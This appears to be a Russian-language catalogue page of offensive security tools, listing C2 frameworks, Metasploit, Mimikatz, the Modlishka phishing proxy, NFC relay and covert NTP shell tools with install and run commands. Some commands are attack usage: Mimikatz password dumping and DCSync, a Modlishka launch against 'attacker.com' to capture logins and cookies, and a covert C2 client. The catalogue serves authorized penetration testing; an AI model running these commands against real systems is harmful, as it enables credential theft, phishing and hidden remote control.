Каталог инструментов

473 инструментов

Merlin

v2.1.4
Exploitation

Кроссплатформенный C2-сервер и агент на Go с транспортом по HTTP/2 для постэксплуатационных сценариев в рамках авторизованного пентеста.

wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z 7z x merlinServer-Linux-x64.7z sudo ./merlinServer-Linux-x64 ./data/bin/merlinCLI-Linux-x64

MetaLLM

Exploitation

Фреймворк в стиле Metasploit для тестирования безопасности AI и ML с более чем 40 эксплойт-модулями, нацеленными на уязвимости из OWASP LLM Top 10.

git clone https://github.com/scthornton/MetaLLM.git cd MetaLLM python -m venv venv source venv/bin/activate pip install -r requirements.txt

Metasploit Framework

v4.11.7
Exploitation ★ featured

Самый известный фреймворк для пентеста и разработки эксплойтов. Содержит тысячи модулей: эксплойты, пейлоады, вспомогательные модули, пост-эксплуатацию. Поддерживает stageless/staged payload, Meterpreter, автоматизацию через скрипты и REST API. Используется в …

# Kali / Parrot (предустановлен) msfconsole # Быстрая установка (Debian/Ubuntu) curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall && sudo ./msfinstall # Обновление sudo msfupdate
Блог

Mimikatz

v2.2.0-20220919
Post-Exploitation

Инструмент для извлечения паролей, хешей, PIN-кодов и Kerberos-тикетов из памяти Windows. Поддерживает Pass-the-Hash, Pass-the-Ticket, Golden/Silver Ticket, DCSync и другие техники. Стандартный инструмент любого Windows-пентеста и red team операции.

# Сборка из исходников (Visual Studio 2019+): git clone https://github.com/gentilkiwi/mimikatz # Открыть mimikatz.sln, собрать x64 Release # Или скачать готовый бинарь: # https://github.com/gentilkiwi/mimikatz/releases # Запуск и дамп паролей: mimikatz.exe privilege::debug sekurlsa::logonpasswords lsadump::dcsync /domain:corp.local /user:Administrator

Minino

v1.1.15.2
Hardware & Industrial

Мультипротокольная плата на ESP32-C6 для сниффинга и атак на IoT: BLE, Wi-Fi, Zigbee, Thread, Matter и GPS

git clone https://github.com/ElectronicCats/Minino.git cd Minino pio run -t upload

Modlishka

Exploitation

Реверс-прокси для фишинга — проксирует реальные сайты в реальном времени и перехватывает учётные данные и сессионные куки. Поддерживает TLS, кастомные домены и автоматическое внедрение payload-а. Альтернатива Evilginx без …

# Требуется Go 1.14+: git clone https://github.com/drk1wi/Modlishka cd Modlishka go build # Запуск: ./modlishka -proxyDomain attacker.com -target targetsite.com \ -listeningPort 443 -tls true

Mr.SIP

Network Analysis

Комплексный инструмент анализа и атак на SIP-протокол. Возможности: перехват SIP-регистраций, spoofing Caller ID, SIP flood DoS, INVITE/REGISTER сканирование, перехват медиа RTP-потоков, генерация произвольных SIP-сообщений.

git clone https://github.com/meliht/Mr.SIP cd Mr.SIP && pip install -r requirements.txt python3 mrsip.py

Mythic

v3.4.0.5
Post-Exploitation

Модульный C2-фреймворк с веб-интерфейсом, поддерживающий множество агентов (Apollo, Poseidon, Medusa и др.) через Docker-контейнеры. Поддерживает Windows, Linux, macOS. Каждый агент — отдельный плагин, легко расширяется.

# Требуется Docker и Docker Compose: git clone https://github.com/its-a-feature/Mythic cd Mythic sudo ./install_docker_ubuntu.sh sudo make # Установка агента: sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo # Запуск: sudo ./mythic-cli start # Веб-интерфейс: https://localhost:7443

Mythic

v3.4.0.5
Exploitation

Кросс-платформенная, управляемая через плагины платформа для эмуляции противника (adversary emulation) с веб-интерфейсом, используется командами авторизованного red-teaming.

sudo make sudo ./mythic-cli start sudo ./mythic-cli install github https://github.com/MythicAgents/apfell sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http

Mythril

v0.24.8
Blockchain / Web3

Инструмент безопасности Ethereum-контрактов от ConsenSys. Использует symbolic execution, concolic analysis и SMT-solving для обнаружения reentrancy, integer overflow, arbitrary jump, delegatecall injection. Работает с EVM-байткодом без исходников.

pip install mythril # Анализ по адресу контракта в mainnet myth analyze --address 0xABCD... --infura-id YOUR_ID # Анализ файла myth analyze contract.sol

NFCGate

v2.6.1
Exploitation

Android-приложение для relay-атак на NFC. Перехватывает NFC-трафик между картой и терминалом, ретранслирует через IP-сеть на второе устройство. Поддерживает: capture, replay, relay, клонирование Mifare Classic. Позволяет обходить RFID-доступ на …

# Установить APK на 2 Android-устройства с NFC: https://github.com/nfcgate/nfcgate/releases # Одно — у жертвы (capture/relay), второе — у терминала (relay/replay)

NTPShell

Post-Exploitation

Скрытый C2-канал, передающий команды и данные внутри NTP-пакетов — трафик выглядит как обычная синхронизация времени и слабо детектируется сетевым мониторингом. Написан на C, сервер и клиент в одном …

git clone https://git.toolsofthetrade.qzz.io/recovered/ntpshell.git cd ntpshell gcc ntp.c -lpthread -o ntp # C2-сервер: ./ntp -S # C2-клиент (управляемая машина): ./ntp -C -s <server_addr>